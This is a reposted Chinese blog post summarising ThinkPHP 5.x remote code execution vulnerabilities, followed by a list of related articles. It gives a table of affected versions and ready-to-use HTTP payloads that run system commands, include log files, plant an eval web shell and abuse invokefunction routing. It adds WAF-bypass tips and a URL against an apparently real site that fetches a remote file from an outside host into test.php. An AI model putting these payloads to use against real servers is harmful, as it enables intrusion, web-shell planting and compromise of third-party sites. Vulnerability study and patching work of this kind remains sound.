thinkphp5.x系列 RCE总结

最新推荐文章于 2025-02-10 20:25:15 发布
转载 最新推荐文章于 2025-02-10 20:25:15 发布 · 2.9k 阅读 · 1 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/0xdd/p/10848746.html
文章标签:

#php #操作系统 #runtime

本文详细解析了ThinkPHP框架中两种常见的远程代码执行(RCE)漏洞,包括Request变量覆盖导致的RCE及路由控制不严谨引起的RCE。针对不同版本,提供了具体的攻击条件和payload,同时涉及了5.0.0至5.0.23及5.1.31以下版本的漏洞利用方式。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Thinkphp  MVC开发模式

执行流程:

首先发起请求->开始路由检测->获取pathinfo信息->路由匹配->开始路由解析->获得模块、控制器、操作方法调度信息->开始路由调度->解析模块和类名->组建命名空间>查找并加载类->实例化控制器并调用操作方法->构建响应对象->响应输出->日志保存->程序运行结束

漏洞原因:路由控制不严谨,默认不开启强制路由,从而可以任意调用Thinkphp的类库

 

主要有俩种方法,1.Request中的变量覆盖导致RCE  2.路由控制不严谨导致的RCE

 

1.Request中的变量覆盖导致RCE

版本名 是否可被攻击 攻击条件
5.0.0 否 无
5.0.1 否 无
5.0.2 否 无
5.0.3 否 无
5.0.4 否 无
5.0.5 否 无
5.0.6 否 无
5.0.7 否 无
5.0.8 是 无需开启debug
5.0.9 是 无需开启debug
5.0.10 是 无需开启debug
5.0.11 是 无需开启debug
5.0.12 是 无需开启debug
5.0.13 是 需开启debug
5.0.14 是 需开启debug
5.0.15 是 需开启debug
5.0.16 是 需开启debug
5.0.17 是 需开启debug
5.0.18 是 需开启debug
5.0.19 是 需开启debug
5.0.20 否 无
5.0.21 是 需开启debug
5.0.22 是 需开启debug
5.0.23 是 需开启debug

 

5.0.0-5.0.12
payload:

POST /tp5010/public/index.php?s=index/index/index HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 52
Content-Type: application/x-www-form-urlencoded

s=whoami&_method=__construct&filter[]=system

5.1版本,需设置error_reporting(0);

POST /tp5132/public/index.php HTTP/1.1
Host: 127.0.0.1:8000
Content-Type: application/x-www-form-urlencoded
Cookie: XDEBUG_SESSION=PHPSTORM
Content-Length: 28

c=system&f=id&_method=filter
利用文件包含

_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=../data/runtime/log/201901/21.log&x=phpinfo();
利用其他变量传参

_method=__construct&method=get&filter[]=call_user_func&server[]=phpinfo&get[]=<?php eval($_POST['x'])?>

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

2.路由控制不严谨导致的RCE   

v5.0.23及v5.1.31以下版本

 

 

 

index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1


https://xz.aliyun.com/t/3570 thinkphp win 和linux 的区别

https://www.butian.net/4e5e5d7364f443e28fbf0d3ae744a59a
thinkphp 3 指纹识别 4e5e5d7364f443e28fbf0d3ae744a59a GET

绕宝塔 -主要还是函数和正则上的绕过
http://yishangtv.com/index.php?s=&Fuck=copy(%22http://www.letv.cloud/ad.txt%22,%22test.php%22)
_method=__construct&filter=assert&method=get&server[REQUEST_METHOD]=echod

还有一种思路 利用\think\ 类库的 方法
做文件包含,把马内容写到log

 

 

关于第一种方法,在基于tp5开发的cms 复现

mipcms 最新版本。debug 需要打开

 

url : http://127.0.0.1/ms/?s=index

payload:

c=assert&f=phpinfo()&_method=filter

 

 

关于第二种方法,在基于tp5开发的cms 复现 Powered by qibosoft X1.0 Beta Code ©2003-2018

http://127.0.0.1/x1(1)/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

 

 

 

转载于:https://www.cnblogs.com/0xdd/p/10848746.html

ThinkPHP 5.x RCE分析
0verWatch的博客
02-15 6474
第一次进行代码量这么大的分析,记录一下,个人感觉新手真的不适应这种,应该找点小一点的cms去分析,如果不懂MVC架构真的可能会懵。。。 前言 在分析这个之前还看了两篇tp5RCE漏洞,这两个洞都是很相似的,都是利用一个可控的变量dispatch去实现到最后还是构造出回调函数,可以学习一下,感觉这里面的思路就是本文分析漏洞的来源 https://xz.aliyun.com/t/3845 https...
ThinkPHP 5.x RCE 漏洞分析与利用总结
dengzhasong7076的博客
01-21 5107
近日ThinkPHP出现由于变量覆盖而引起的RCE,其漏洞根本源于thinkphp/library/think/Request.php中method方法可以进行变量覆盖,通过覆盖类的核心属性filter导致rce,其攻击点较为多,有些还具有限制条件,另外由于种种部分原因,在利用上会出现一些问题。 例如: 1、大部分payload进入最后rce的函数是调用了call_user_func,其...
thinphp5rce漏洞复现
mlws1900的博客
07-07 382
docker搭建过程和2rce一样,不多赘述thinkphp2rce漏洞复现_mlws1900的博客-优快云博客环境搭建成功 poc 执行命令把vars[0]=system&vars[1][]=命令漏洞复现成功
ThinkPHP5_RCE
最新发布
Dikesi的博客
02-10 511
ThinkPHP 5.x版本 RCE漏洞
thinkphp5RCE
weixin_45778886的博客
03-07 2020
这里写目录标题加载第三方类库captcha路由。非debugpayload:1.路由检测1.1跟进self::routeCheck1.2跟进Route::check1.2.1在check函数进入$request->method(),1.2.2进入method()函数1.2.3进入__construct函数1.3跟进self::checkRoute1.4 跟进self::checkRule1.5跟进self::parseRule2.路由检测后,进入self::exec函数2.1 跟进exec函数2.2R
thinkphp5 rce
weixin_51558394的博客
08-17 532
thinkphp5 rce
ThinkPHP5--rce远程代码执行
m0_74402888的博客
04-30 1396
ThinkPHP5版本中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。
ThinkPHP3.2.x RCE漏洞通报1
08-03
ThinkPHP3.2.x RCE漏洞通报】中提到的安全问题涉及到ThinkPHP 3.2版本的一个严重远程代码执行漏洞。这个漏洞源于框架中的`assign`方法,该方法用于将变量传递给模板进行渲染。当攻击者能够控制`assign`方法的第一...
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
### ThinkPHP 5.0.x/5.1.x 变量覆盖远程代码执行(RCE)漏洞分析 #### 漏洞概述 ThinkPHP 5.0.x 和 5.1.x 版本中存在一个变量覆盖导致的远程代码执行(RCE)漏洞。该漏洞利用者可以通过对特定HTTP请求参数的精心...
php5漏洞汇总,ThinkPHP 5.x RCE 漏洞分析与利用总结
weixin_34931142的博客
03-19 1364
一、ThinkPHP 5.0.23 rce漏洞复现与总结漏洞复现thinkphp 5.0.23 rcethinkphp 5.0.23 rce源码下载:github:https://github.com/top-think/framework/tree/v5.0.23影响版本ThinkPHP 5.0系列 < 5.0.23ThinkPHP 5.1系列 < 5.1.31安全版本ThinkPH...
学习笔记-ThinkPHP5之任意方法调用RCE(六)
人饭子的博客
11-09 506
书接上文 利用method的任意方法调用,调用构造函数__construct,且调用时会传入$_POST数据,那么组合起来就是执行method方法可以控制类的成员变量的值。 filterValue中存在 call_user_func函数可以恶意利用,关注其参数$filters是否可控。 getFilter方法存在这样$filter = $filter ?: $this->filter;...
Thinkphp 5-RCE漏洞复现
Tender*的博客
08-10 1166
ThinkPHP5披露最多得漏洞就是RCE,其中的影响版本范围非常广漏洞原理其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。影响版本不同版本 payload 不同,且5.13版本后还与debug模式有关漏洞复现进入​。
ThinkPHP5RCE漏洞复现
飞雪 SecurityBlog
06-16 377
Payload:/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
ThinkPHP5.0.0~5.0.23RCE 漏洞分析及挖掘思路
shelter1234567的博客
01-16 2392
本节我将分析thinkphp5.0.x 版本的RCE漏洞,根据漏洞的研究模拟挖掘此漏洞的思路
PHPrce函数,Thinkphp5-1-2-RCE简单分析
weixin_30332165的博客
04-12 517
前言上次出的洞是接近元旦吧,好像刚从南京回学校,要准备烦人的期末,没心思分析,前天我刚考完,今天刚爆的洞洞貌似。然后自己跟着调试了一下。漏洞细节这是复现图前提是要在index.php中禁止报错,其实在生产环境中,开发也会这么做。漏洞点在\thinkphp\library\think\Request.php中的method函数:public function method($origin = fal...
ThinkPHP--5.0.23-rce远程代码执行
m0_74402888的博客
05-03 927
实现框架的核心类Requests的method方法实现表单请求类伪装,默认为$_POST[‘_method’]变量,却没有对_method属性进行严格校验,可以通过变量覆盖Requests类的属性,在结合框架特性实现对任意函数的调用实现任意代码执行。攻击者可向缓存文件内写入PHP代码,导致远程代码执行。
Thinkphp 5.0.24变量覆盖漏洞导致RCE分析
bhegi_seg的博客
07-31 1698
好了,回到正题,继续跟进到877行,
Thinkphp5.0.15 SQL注入
feng的博客
03-05 2220
前言 刚把tp5RCE给审的差不多了,审的很爽,接下来审一下thinkphp5各个版本的SQL注入。 代码不用说了,composer先下载下来。 composer create-project topthink/think=5.0.15 thinkphp5.0.15 下载来的%99都是版本不对,改一下composer.json 然后composer update就可以了。 index控制器那里写一下insert语句: class Index { public function index()
thinkphp5 未开启强制路由RCE
fmyyy1的博客
07-28 578
演示版本5.0.15 最终是利用反射调用函数执进行RCE application/config.php下强制路由默认为false 从payload来看 ?s=index/\think\app/![invokefunction](https://img-blog.csdnimg.cn/d8840390e06843daa80de48c6c20195c.png) &function=call_user_func_array&vars[0]=system&vars[1][]=whoami
thinkphp3.2.x rce
12-18
ThinkPHP是一个开源的PHP开发框架,它的版本3.2.x是一个老版本,存在远程命令执行(RCE)漏洞。这个漏洞允许攻击者通过构造恶意请求来执行任意的系统命令,从而获得对应用服务器的完全控制权限。 这个漏洞的原因是在ThinkPHP 3.2.x版本的核心代码中没有对用户的输入进行充分的过滤和校验。攻击者可以利用这个漏洞来执行各种恶意操作,比如上传恶意文件、修改数据库内容或者获取系统敏感信息等。 为了利用这个漏洞,攻击者需要构造一个特殊的请求,其中包含可执行的系统命令。然后将这个请求发送到受影响的应用程序的漏洞点上。当应用程序在处理这个请求时,会将其中的系统命令当作可执行代码来执行,最终导致攻击者获取对应用服务器的控制权限。 为了修复这个漏洞,用户可以升级到最新版本的ThinkPHP框架。在最新版本中,开发者已经修复了这个漏洞,并加强了对用户输入的过滤和校验。此外,用户还可以根据自己的需求对应用程序进行进一步的安全加固,比如限制上传文件的类型和大小,对用户输入进行严格的过滤和校验等。 总之,ThinkPHP 3.2.x版本存在远程命令执行漏洞,攻击者可以通过构造恶意请求来执行任意的系统命令。为了修复这个漏洞,用户可以升级到最新版本的ThinkPHP框架,并加强应用程序的安全加固措施。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值